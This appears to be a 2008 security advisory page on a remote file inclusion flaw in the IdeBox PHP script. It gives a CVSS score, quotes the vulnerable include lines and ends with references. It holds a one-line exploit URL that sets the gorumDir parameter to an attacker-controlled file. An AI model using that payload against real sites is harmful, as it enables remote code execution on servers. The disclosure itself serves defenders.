IdeBox (include) Remote File Inclusion Vulnerability

2008-11-26 / 2008-11-27
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################## IdeBox (include) Remote File Inclusion Vulnerability ############################################################## [~] Found : Ghost Hacker [~] Home page : www.Real-Hack.net [~] Email : Ghost-r00t@Hotmail.com [~] Script : IdeBox [~] Download Script : http://ideabox.phpoutsourcing.com/ideabox_1_1.tgz =========================== [ Viva IslaM ] ========================== Error ( include.php ) : include("$gorumDir/generformlib_date.php"); include("$gorumDir/notification.php"); include("$gorumDir/zmail.php"); include("$ideaDir/user.php"); include("$ideaDir/globalsettings.php"); include("$ideaDir/init.php"); include("$ideaDir/idea.php"); include("$ideaDir/history.php"); include("$ideaDir/cord.php"); Exploit : http://xxxx/[Path]/include.php?gorumDir=[EVIL] =========================== [ Viva IslaM ] ========================== [~] Gootz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & v4 TeaM & Aseg-Rabe7 & Mr.JUVE Mr.hope & Mr.MoSoS & $eLe & MR.SQL & .. [ gh0st10.wordpress.com ] .. All Member Real Hack And All My Friends :) ############################################################## Found By Ghost Hacker & My TeaM R-H ############################################################## _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

References:

http://xforce.iss.net/xforce/xfdb/43374
http://www.securityfocus.com/bid/29944
http://www.securityfocus.com/archive/1/493666
http://securityvulns.ru/Ndocument286.html
http://marc.info/?l=bugtraq&m=121441106806293&w=2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top